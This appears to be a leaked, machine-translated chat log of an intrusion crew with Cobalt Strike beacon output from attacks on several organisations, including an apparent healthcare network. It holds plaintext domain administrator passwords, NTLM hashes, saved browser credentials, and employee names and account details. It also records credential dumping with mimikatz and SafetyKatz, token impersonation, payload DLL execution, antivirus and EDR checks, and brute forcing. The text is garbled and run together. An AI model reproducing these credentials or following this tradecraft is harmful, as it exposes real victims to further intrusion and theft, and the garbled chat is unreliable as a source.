Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:07b16da56f8d9389b7e093bab1b90983:::

``Handsome man'') +sploit? There is a system by my saved messages from ms outlook
abhinav.bhaskar
chandan koushik.s mohit.goel
nitin.choudhary pritam sudhir
varun vivek.kumar
The command completed successfully.

``Be looking furtherxxm, it's unlikely you'll be able to brute force====== CredEnum ====== what's the group? From seabelt what's the hash?
  Target : LenovoSsoSdkDidToken
  UserName : LenovoSsoSdk
  Password : b9352d67360260a670e5fcea3efebe7faae0b5baabb1339247f07fa2e6b5d0270
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 13-07-2020 13:59:07

  Target : DeviceMetrics
  UserName : DeviceMetricsUserName
  Password : 0023b668-0ad7-4e6e-aefe-8822e1471728,00002d6ae2381ed4ebd88db03cdc8b991d025b7db8a551556d269716eb1e3352616ea972f08db23cf983371a2ed7fc6c6a2ea7c687a290111e51545c94c5873a
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 11-12-2019 15:03:33

```
Can you unload it? You're better off) No trusts, can you continue to work in the vault?
beacon> run rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint
[*] Tasked beacon to run: rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint
[+] host called home, sent: 116 bytes
I'll give you the dll))) Especially the Indians) It's worth it for me))) happay.in+I'm waiting for you to decide on the "validity" and I'll send you the dll okSnap through the verification view not taken off? macafee by the way not really biting AB
====== AntiVirus ======

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : McAfee VirusScan
  ProductEXE : C:\Program Files\McAfee.com\Agent\mcupdate.exe
  ReportingEXE : C:\Program Files\Common Files\mcafee\mmsshost\MMSSHOST.exe



[*] Completed collection in 0.06 seconds
``okjg look av``.
beacon> make_token JDOSSN\nddevbernst Tractor20!
[*] Tasked beacon to create a token for JDOSSN\nddevbernst
[+] host called home, sent: 47 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
 
beacon> shell dir \\10.28.92.108$
[*] Tasked beacon to run: dir \10.28.92.108$
[+] host called home, sent: 52 bytes
[+] received output:
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.
``There is a session in the cob.
From the input pc you can see 15 machines (42 in total), the network has only servers(2008-2019)
445, skul, ftp and web ports are closed
The user apparently does not use the account for a long time or only uses the Citrix web interface, since his files are gone from the word at all.
There is only one DA on the net and his kerb is there
Search for files, balls, etc. did not give anything (browser is not used and the password keeper is also not)
Gpp,zerologon - bypassed
Mass scan on what is next to the network by mask did not give anything, except for those that are already lit before
No way to understand - tried all the lpe exploits from msf'aTell me one last message what's done so farIt's the same
None of the exploits worked.
Give me a new one)and then give me a new oneEven 15 minutes for the checkpoint I can't get to the lpe exploits in the msf
nothing works, a lot of lpe failed for the reason that the wine server and not 10 and so on here we have what? then think about it and if you miss give replacement lpe and whine not found anything with the 445 port
in the plans to continue lpe chisel soon will come as usual waiting for an hour but for the future, we need to look for a admin cuda, so far so) and already have something to go?) some serious avtut carefully oooh what AV?[ ](https://mediaeveryone.com/group/pkgprod?msg=SKZBNqfdN6jjNDciK) is it like?and you found yes? but it's tomorrow or through vmik startup suggest to make a balloon and throw there dllv decided to make a mold of the system and deploy locally?)) what do you have there at all for 4gb? then write to the address) 104....140 yours? 200 mb * and moreover files over 200 gb in a compressed state are not downloaded through kobufiles over 50 meters are archived you there what you download in general?
user2-2 beacon> download C:\ProgramData\trustdmp_17.txt
[*] Tasked beacon to download C:\ProgramData\trustdmp_17.txt
[+] host called home, sent: 70 bytes
[-] File 'C:\ProgramData\trustdmp_17.txt' is either too large (>4GB) or size check failed
´´and the sabnetters took it away?´´(https://mediaeveryone.com/channel/general?msg=HsR2bCoAz5ywv56vK) @tl1call dept plz, otherwise he won´t answer again.´´
a couple of shellcodes were sent to him to bypass simantecrelease give me a sign of life that I'm not writing to myselfnado urgently make #1-done-rtpcompany-com priority now104.....69 coba there are still alive
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
``but it's old, you need to update all the access info in the confidenc inopnomdidic+user? and so? i don't see any new sessions in it, i don't see your cobuternicus.com
74.118.138.118demain kobaNo flylel or give me a psh stager i'll throw in my koba want dll@user3 load go) thank you`waterway.com` do the confab please`z3 will be on #wilsonart-com now i'll prepare the second grid to work, who will take over?[ ](https://mediaeveryone.com/channel/general?msg=oR3f2Th2ZEpq7J4DW) Yes you can of course still look for cna as an option)can be in the note of each color to assign a symbol :zany_face:as far as I know you can not)to be beautiful? =))))) i think not@tl1 @tl2 in the cob can you implement sorting sessions by color? network seems to be small, accesses and work YES right on the point of entrypointe1 network so far give silkodia in the confab screenshots kidalnetesessions did not fall off? ok, and what about yesterday's session? it is not really scrambled anything yet with wilsonart to work later or give dll?@tl1 where to yank those 2 sessions with YES ?helloprivodestvo:space_invader:see you tomorrow)goodnight)ehGoodnightnightnightnight tomorrow that is today all goodnight do not forget that tomorrow at 5 there will probably cross with quarantine)look DNS WSUS / SCCM servers in all trusts got through kst except quarantine I do not understand, we burned that `` or something ``
beacon> shell ping LRH-NESSUS01.lrhc.local
[*] Tasked beacon to run: ping LRH-NESSUS01.lrhc.local
[+] host called home, sent: 59 bytes
[+] received output:
Ping request could not find host LRH-NESSUS01.lrhc.local. Please check the name and try again.

``````
dn:CN=LRH-NESSUS01,OU=LRHC Servers,DC=lrhc,DC=local
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (All Users) ===

  [X] Exception: Could not find a part of the path 'C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data'.


=== Checking for Firefox (All Users) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.
``He's got it from Sharprome and what's that?
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://support.lrhc.org/,https://support.lrhc.org/,9/7/2017 12:27:56 PM,13149278876245510,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://lansweeper.lrhc.local/,http://lansweeper.lrhc.local/,9/7/2017 2:11:31 PM,13149285091430011,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}

``?'' mail accesses nothing interesting there can be accesses from accountsdump browser then from winlogon exactly the same as in winlogon?
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SafetyKatz.exe
[*] Tasked beacon to run .NET program: SafetyKatz.exe
[+] host called home, sent: 836651 bytes
[+] received output:

[*] Dumping lsass (572) to C:\WINDOWS\Temp\debug.bin
[X] Dump failed: False

[+] received output:

[*] Executing loaded Mimikatz PE

  .#####.   mimikatz 2.1.1 (x64) built on Jul 7 2018 03:36:26 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ## /*** Benjamin DELPY `gentilkiwi' ( benjamin@gentilkiwi.com )
 ## \ / ## > http://blog.gentilkiwi.com/mimikatz
 ## v ## Vincent LE TOUX ( vincent.letoux@gmail.com )
  # # '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # Opening : 'C:\Windows\Temp\debug.bin' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Memory opening

``cmelliott
this one didn't get dumped
this one is not on siteada I and so dump the logonpas if they are on site then look for their pku the two remaining hashes have not passed on kmd5 only with the label IT there is a clear only from gsnelsonjuju the result is kind of clear tasks `` ``
10.5.50.228:445 (platform: 500 version: 5.1 name: IT03 domain: LRHC)
``````
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
``+ go to the trustshersti their pc and check the mail from the list above take the guys with a descriptive ITa, well this know) in any case you have a hooked socket, all reopened messages (reset label "unread") because of your actions back, so do not delete anything, do not write, do not call, do not forward) `` ``
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>sAMAccountName: slarsen
>description: Listed as Shawn Larsen account shawn
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
 
>sAMAccountName: PRHADMIN
>description: MEI's and Grant's Admin account for lrhc
```
```
>memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning

>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: llpearso
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: mtsuser
>description: Pargon Admin
 
>sAMAccountName: Administrator
>description: Built-in account for administering the computer/domain
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: magrel
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: frsecure
>description: FRSECURE account for network test
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: parafhir
>description: FHIR user
 
>sAMAccountName: sbgravning
 
>sAMAccountName: tableauadmin
 
>sAMAccountName: ocmagrel
 
>sAMAccountName: ocansi
 
>sAMAccountName: ocbdi
 
>sAMAccountName: occoldagt
 
>sAMAccountName: ocsign
 
>sAMAccountName: ocbatchcmp
 
>sAMAccountName: ocile
 
>sAMAccountName: ocindexagt
 
>sAMAccountName: ocpurge
 
>sAMAccountName: octransagt
 
>sAMAccountName: ocweb
 
>sAMAccountName: ocfaxin
 
>sAMAccountName: ocadmin
 
>sAMAccountName: OCARCREL
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: djkrog
>description: CIS
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: llpearso
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
```
```
>memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local
 
>sAMAccountName: djkrog
>description: CIS
 
>sAMAccountName: ldkugler
>description: CIS
 
>sAMAccountName: mjblank
>description: Systems Analyst
 
>sAMAccountName: jyrkwa
>description: CIO
 
>sAMAccountName: smhanson
>description: CIS
 
>sAMAccountName: mdflugstad
>description: CIS
 
>sAMAccountName: intranet
>description: LRHC's Intranet Access
 
>sAMAccountName: taaxness
>description: Clinical Systems Analyst II
 
>sAMAccountName: trthormodson
>description: CIS
 
>sAMAccountName: cbstigen
 
>sAMAccountName: mjkvern
>description: CIS
 
>sAMAccountName: shanson
>description: CIS
 
>sAMAccountName: jdpettigrew
>description: CIS
 
>sAMAccountName: ljcurrie
>description: Clinical System Analyst II
 
>sAMAccountName: cmelliott
>description: IT
 
>sAMAccountName: sbgravning
 
>sAMAccountName: gsnelson
>description: PRH IT Coordinator
In addition to not taking anything there, can you tell me if there is something we do not know? Do you need to tell the rules or is it that obvious? search for his username, hostname, etc. through the local exxcheck his email in chrome no credentials saved, only visible in the login gootd, authorization asked what was shown? so the client run? in chrome history showed that he logged in to the sphere
+ he had a client installed and you said he was gone for a few days you said you found where he had the client installed I don't understand something) only found that he went to the sphere - nothing else so what did you find? 3) we went through the RDP - he was gone for several days so here's the plan:
1) now look more "interesting" people from the groups above and the classics look at their pk
2) go to their mail server under the codes of your internal DA and other IT staff and look at their correspondence for access on the sphere
3) wait for `gsnelson` to get off the car and go to rp and try to get in
4) get into the trust, it looks like there's an admin one {\10.91.19.35\volume_1}) go to another trustshaloon and did not say))) I took the quarantine through another domain, how did you take it off?) I did) @user7 you took the quarantine from there[ ](https://mediaeveryone.com/group/lrhc-org?msg=MQjLTQ8JLjE8EH4qy) is there a hell of a lot of information about us?
Shared resources at 10.91.19.35

DNS-323

Share name Type Used as Comment

-------------------------------------------------------------------------------
lp Print USB Printer
Volume_1 Disk
web_page Disk Enter Our Web Page Setting
The command completed successfully.

``````
Shares for 10.91.19.35:
	[--- Unreadable Shares ---]
		lp
		IPC$
	[--- Listable Shares ---]
		Volume_1 web_page
``Give it net viewnas in quarantine...hmmm in quarantine is there such a thing, are we interested?
10.91.19.35:445 (platform: 500 version: 4.9 name: IT-DLINK-NAS domain: ELEAH)

	[--- Listable Shares ---]
		Volume_1 web_page
``Win authorization didn't go through either, didn't get the root pass? Did you try it? Vin 10? Was it in the processes on the computer? Do you have his clipass in his processes? Was there a websphere client in his processes, but the gootlogin dude gsnelson has access?
 where the websphere client was.
1) do we have access to the rdp there?
2) what is his username?

``Yes, I'm collecting a list so is anyone here? ``memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local``
this one is not needed1) do we have access to rdp there?
2) his login what? where was the websfer client all others here list login name + its title, description``.
>memberOf: CN=PRH CPSI Admins,OU=PRH Distribution Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>memberOf: CN=PRH CIS - RW,OU=PRH Security Groups,OU=PRH Groups,OU=Prairie Ridge,DC=lrhc,DC=local
>memberOf: CN=PRH_support,OU=Groups,DC=lrhc,DC=local
>memberOf: CN=G_CISTechs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS_VNC,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS.Techs,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=IT,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=Computer Information Systems,OU=CIS,OU=Departments,DC=lrhc,DC=local
>memberOf: CN=CIS Support,OU=CIS,OU=Departments,DC=lrhc,DC=local
``[ ](https://mediaeveryone.com/group/lrhc-org?msg=f7BhjsG2Dhj4biXts) yu[ ](https://mediaeveryone.com/group/lrhc-org?msg=X9DRqmQNLciwimKcf) who?
-------------------------------------------------------------------------------
Admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson nmsapps OnPremMigAdmin1
OnPremMigAdmin2 OnPremMigAdmin3 PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
found one where you went to the sphere, no credentials saved give me a list and I'll try to look outside the domain they don't have a normal admin computer labeled
i went to the oushkek where they should have admin PCs - i told you gsnelson but there are iis and printers everywhere from Administrator
on one machine was a link to veeam.com without any credit process YES will be decent on a large number of servers how many got around did not count
i go where there are processes on rdp session or hanging process yes
gsnelson has a spheres client on his truck, i try to find out how many admins and itspecialists/how many have bypassed it? total send the unnecessary to the sliptout uncontrollable uzhetak we almost all sit in the same cob) what is the noise, and i?about so many sessions what? @user4 what did i ever say about sessions?
192.168.0.247
 192.168.0.253
```
they have rdp access to these machines can't session gopher?[ ](https://mediaeveryone.com/group/lrhc-org?msg=zXPB8m4QmuixuSYr2) They don't have SSHCPNBACKUP.lrhc.local if only the keylogger catches them there's nothing
They don't save passwords.
+ kind of go to the sphere through the client, not through the web then shoot without a sessionthere sits YES, open chrome - 10.91.18.119
sessions do not fly there is a list of software on the machines ``{lrhprofiles\admins\pcsysteminfo`` here are files on all computers in them is specified who LA on what machine ``
```
  UseWUServer : True
  Server : http://prh-print01:8530
  AlternateServer :
  StatisticsServer : http://prh-print01:8530

```
``````
--- Chromium Credential (User: prhlab) ---
URL : https://www.api-pt.com/login.aspx
Username : 64413
Password : h(e? ?5S

--- Chromium Credential (User: prhlab) ---
URL : https://www.instrumentationlaboratory.com/us/en
Username : manelite
Password : ??? o*?

--- Chromium Credential (User: prhlab) ---
URL :
Username : lrhc\nlarson
Password : ??=?rGK

--- Chromium Credential (User: prhlab) ---
URL :
Username : lrhc:\nlarson
Password : Jih.63*d

--- Chromium Credential (User: prhlab) ---
URL :
Username : nlarson
Password : Jih.63*d
```
```
>sAMAccountName : bnlarson
>memberOf : CN=LRHC_Replica_Users
```192.168.0.90```
Bookmarks (cblascyk):

    Name : WorkPlace Login
    URL : http://10.10.30.212/workplace/Central/Login.aspx?Message=&Popup=0&ONLOGIN=http%3a%2f%2f10.10.30.212%2fworkplace%2fCentral%2fDashboard.aspx

    Name : CelériTime
    URL : http://10.10.30.223/ctapp/Login.aspx


Bookmarks (jschmidgall):

    Name : CelériTime
    URL : http://10.10.30.223/ctapp/Login.aspx

    Name : Workplace
    URL : http://10.10.30.212/workplace/Central/Dashboard.aspx
```192.168.0.192```
CN=OCMAGREL,OU=Service Admins,
````ocmagrel`` this username is found everywhere``
10.10.39.194:9443
10.10.39.194:9087
10.10.39.194:9084
10.10.39.194:8084
10.10.39.194:7444
10.10.39.194:6502
10.10.39.194:6501
10.10.39.194:5580
10.10.39.194:5480
10.10.39.194:2020
10.10.39.194:2015
10.10.39.194:2014
10.10.39.194:2012
10.10.39.194:636
10.10.39.194:443
10.10.39.194:389
10.10.39.194:88
10.10.39.194:80
Good night, good night, good night... 3 a.m. we'll close by tonight and you'll have 7 hours to get ready... that's it 8 a.m. let's sleep it off, just tell me what time to be there? if you have any suggestions ready to listen so what? enough time? 7-8 p.m. Evening in any case, it should be done during their working hours when the admins will be in the networkcalculate that you need to find access to the sphere after 3 a.m. So either end before 5 at local time for sure will not runaday laterWhat time are we going to?i.e. for today i can't on sunday so why don't we reschedule for tomorrow?) and we won't scan the whole range. they just scanned without specifying ports[ ](https://mediaeveryone.com/group/lrhc-org?msg=na3M7jsTWpYMhC59u) everything was strange sphere, no web interface, no ccsh... they may have changed the ports - let's check it outThey have a lot of places + they may go to the lin through itWhy are you looking for vnts?
service RealVNC.SYSTEM.vncserver.vncagent.978162299 -_hash 6023144d82c1866db090b27f884c921c310b505ca9dd0f5be587de06362dc59b
and ea-check the accesses themselves dare guys found, but they say there are still empty cars admins? well then while we chisel the current should be finished but from Mon there will be other work da(and tomorrow is Saturday (well, in general the line is one and in one domain leave for tomorrow? but I have not yet checked it) well if trusts remote from each other I think daona be in all 3? so we will not close it today)
 There are 3 trusts.
and in none of them yet found a sphereuser9 it is Access is denied. rash that with the system, that with the tokenTo remove something need to be in the process user?[ ](https://mediaeveryone.com/group/lrhc-org?msg=2ibwanQe7KArEiJAb) these?(Not one computer from 45 containing in the name of adm is not pinged?
User: gsnelson - IP Address: 10.91.19.227
User: gsnelson - IP Address: 192.168.0.89
 
User: nmsapps - IP Address: 10.10.30.24
 
User: Administrator - IP Address: 10.10.39.105
User: Administrator - IP Address: 10.10.30.123
 
User: PsSupport - IP Address: 10.10.30.249
 
User: PRHADMIN - IP Address: 10.91.19.7
``Rumor has it, I'll try it through tulkit, it seems to work better with sniper.
[-] Invoke_3 on EntryPoint failed.

Have you tried the sharpshooter case?
>sAMAccountName: baleitch
>memberOf: CN=G VNC_User
``````
>sAMAccountName: gdhoff
>memberOf: CN=G VNC_User
``````
beacon> shell ping Scott.lrhc.local
[*] Tasked beacon to run: ping Scott.lrhc.local
[+] host called home, sent: 176 bytes
[+] received output:
Ping request could not find host Scott.lrhc.local. Please check the name and try again.

``````
>dNSHostName: Scott.lrhc.local
>memberOf: CN=Administrators
```
```
dn:CN=Hanson\, Scott
>sAMAccountName: smhanson
>memberOf: CN=CIS_VNC
>memberOf: CN=Backup Notification
``````
192.168.254.36:445 (platform: 500 version: 5.1 name: EMEDWRKSTN domain: WORKGROUP)
``````
    LRH-RDP01.lrhc.local
```
is written in web)you can use a torbrower to check if this kind of thing ```
OfficeMate®, the most widely used server-based practice management solution in the optical industry, offers a secure experience with extensive tools to manage billing, appointment scheduling and inventory
``written into sql''.
>dNSHostName: OFFICEMATE.lrhc.local
>servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:62380
>servicePrincipalName: MSSQLSvc/OFFICEMATE.lrhc.local:OMSQL
>servicePrincipalName: TERMSRV/OFFICEMATE.lrhc.local
>servicePrincipalName: TERMSRV/OFFICEMATE
>servicePrincipalName: WSMAN/OFFICEMATE.lrhc.local
>servicePrincipalName: WSMAN/OFFICEMATE
>servicePrincipalName: RestrictedKrbHost/OFFICEMATE
>servicePrincipalName: HOST/OFFICEMATE
>servicePrincipalName: RestrictedKrbHost/OFFICEMATE.lrhc.local
>servicePrincipalName: HOST/OFFICEMATE.lrhc.local
``honestly sort the fuck out in smtp?'' apparently this fuckin' thing is prefixed by ``LRHR````
SMTP:
    SAGESRVR.lrhc.local
    LRHRECRUIT.lrhc.local
``lazange seems to be pulling everything@tl1 Tell me if there is something for coba to pull the vnc-credits from, as it seems to me ``
vncserver.exe
vmtoolsd.exe
``It looks like a separate category judging by its name, not sql`` at all
>dNSHostName: SAGESRVR.lrhc.local
>servicePrincipalName: SMTPSVC/SAGESRVR.lrhc.local
>servicePrincipalName: SMTPSVC/SAGESRVR
>servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local:1433
>servicePrincipalName: MSSQLSvc/SAGESRVR.lrhc.local
>servicePrincipalName: TERMSRV/SAGESRVR.lrhc.local
>servicePrincipalName: TERMSRV/SAGESRVR
>servicePrincipalName: WSMAN/SAGESRVR.lrhc.local
>servicePrincipalName: RestrictedKrbHost/SAGESRVR.lrhc.local
>servicePrincipalName: HOST/SAGESRVR.lrhc.local
>servicePrincipalName: WSMAN/SAGESRVR
>servicePrincipalName: RestrictedKrbHost/SAGESRVR
>servicePrincipalName: HOST/SAGESRVR
``[ ](https://mediaeveryone.com/group/lrhc-org?msg=8ZDxnERPvj8tGcfR4) then why not a thermal server?
    SAGESRVR.lrhc.local
``[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Kcbqn5Nru9WgNaqns) I'm busy)²svot and fine)oy just about me)strong, nimble, brave and skillful and no one told me that you're short of peopleuser9 needs one volunteer for another mission
 Directory of E:\Backup\VeeamConfigBackup\BGUKHOVEEAM

20/01/2021 11:06 AM <DIR> .
20/01/2021 11:06 <DIR> .
16/01/2021 11:06 396,372,097 BGUKHOVEEAM_2021-01-16_11-00-24.bco
17/01/2021 11:06 396,398,582 BGUKHOVEEAM_2021-01-17_11-00-23.bco
18/01/2021 11:06 396,424,953 BGUKHOVEEAM_2021-01-18_11-00-22.bco
19/01/2021 11:07 396,442,650 BGUKHOVEEAM_2021-01-19_11-00-11.bco
20/01/2021 11:06 396,456,968 BGUKHOVEEAM_2021-01-20_11-00-23.bco
               5 File(s) 1,982,095,250 bytes
               2 Dir(s) 19,409,371,136 bytes free
````CITYISLANDSVR` also only sofos+on dk? sitbelt also can`t detect no red
at least on these
```
bally44hodc1
bgukhoveeam
if there's really only sofos there, then octam red check on googleogleogle psedr_query you can't determine everything once again
[+] Determining what EDR products are installed on BGAZRDC01...
[+] host called home, sent: 358 bytes
[+] No EDR products found! Operate at your own risk!
[+] Determining what EDR products are installed on BALLY44HODC1...
[+] host called home, sent: 60 bytes
[+] No EDR products found! Operate at your own risk!
```
and no EDR products are found on DK.
 Determining what EDR products are installed on WEBMARSHAL...
[+] host called home, sent: 359 bytes
[+] savonaccess.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] Sophos Found!
|"Tell me right away what AV is on the servers.
DA:
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?
BALLYMOREGROUP\CITAdministrator L0ndonT0w3r2009!
BALLYMOREGROUP\bespadmin drithEyuDAZ07ac




Username : BALLYMOREGROUP\admin
Domain : 192.0.2.3
Password : -6&J{*n]e73e]Mm
    192.0.2.3:445
    192.0.2.3:443
    192.0.2.3:80

Username : BALLYMOREGROUP\admin
Domain : 19.2.0.25
Password : Complete2!
    Pinging 19.2.0.25 with 32 bytes of data:
    Request timed out.  100% loss
``````
192.0.2.3 admin -6&J{*n]e73e]Mm
192.0.2.25 admin Complete2!
```
sat sat sat in chat help @user4 went to offdocked putlibslimeyvpn knocked out sit the fuck down to look for cars without sofosatam better yet work through it look for vpn`BALLYMOREGROUP\bespadmin drithEyuDAZ07ac````
====== AntiVirus ======

  Engine : Sophos Anti-Virus
  ProductEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe
  ReportingEXE : C:\Program Files (x86)\Sophos\Sophos Anti-Virus\WSCClient.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
```
```
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 58 bytes
[-] could not open \localhost\\C$\windows\sysnative\drivers\*: 3
[+] No EDR products found! Operate at your own risk!
Tell me what's changed first. The passwords have been changed.
mimic has been disabled in some places and it works and crashes the session where it has not been disabled
sessions die from almost everything (request dir remote/start the case) like russian roulette in essence
us which is 192.0.2.3 was either knocked out or moved to another address@user7
niceadd.com quite enoughtostay yourself from 5 to 10 if you have active sessions of 10 + there slip for 10 minutes not to spam Leave not many sessions good night do not forget to clean the files sleepy night 150slip happy sessions in slip to monday cheers well done everyone thank you +))) tell more @user3 not to be late Mon by 10 am start closing da, lets do so by 10 am probably
they will have an hour at night. do you want it by 10 or on the morning of pnc 4-5 at night on pnc? tomorrow by 6 there is no point in going on a working day in general such things on desktop more shortcut link to disks how to find it? where? on the desktop? chanson mdb had a database where did you find it? yes, if you found access to the center by what time? well, then me and @user8 no sessions(
```
>lastLogon: 132304000305532732
``Look up when did he even log in.``
maybe a long time ago is unlikely)mb he had a lockout on 1 try? well, if you do not lock it specifically, it is unlikely you have locked it)) do not worry)0 in hell info can look at the polzak there is a question of how much badpasswordcount, or in hell info[ ](https://mediaeveryone.com/group/vpinc-net?msg=ooEe2x6qAW8HRqN6A) have not look at the users can look in hell it? it means that he is locked before, locked just now or at another attempt to be locked `` ``
Account lockout detected
``I don't understand that conclusion. It's probably not locked but ``was'' locked.
[-] 10.100.1.101:445 - 10.100.1.101:445 - Could not connect
2 mina lol, session broke down this one broke down all fails with this password let everyone in yes just if you didn't exactly brute force this user or something like that you had nothing to do with it, kznm
```
[-] 10.100.1.101:445 - Account lockout detected on 'jonb', skipping this user.
kerb is not brutalized yet kerb is probably not going to hit anything if it doesn't work for yes or other service you can try
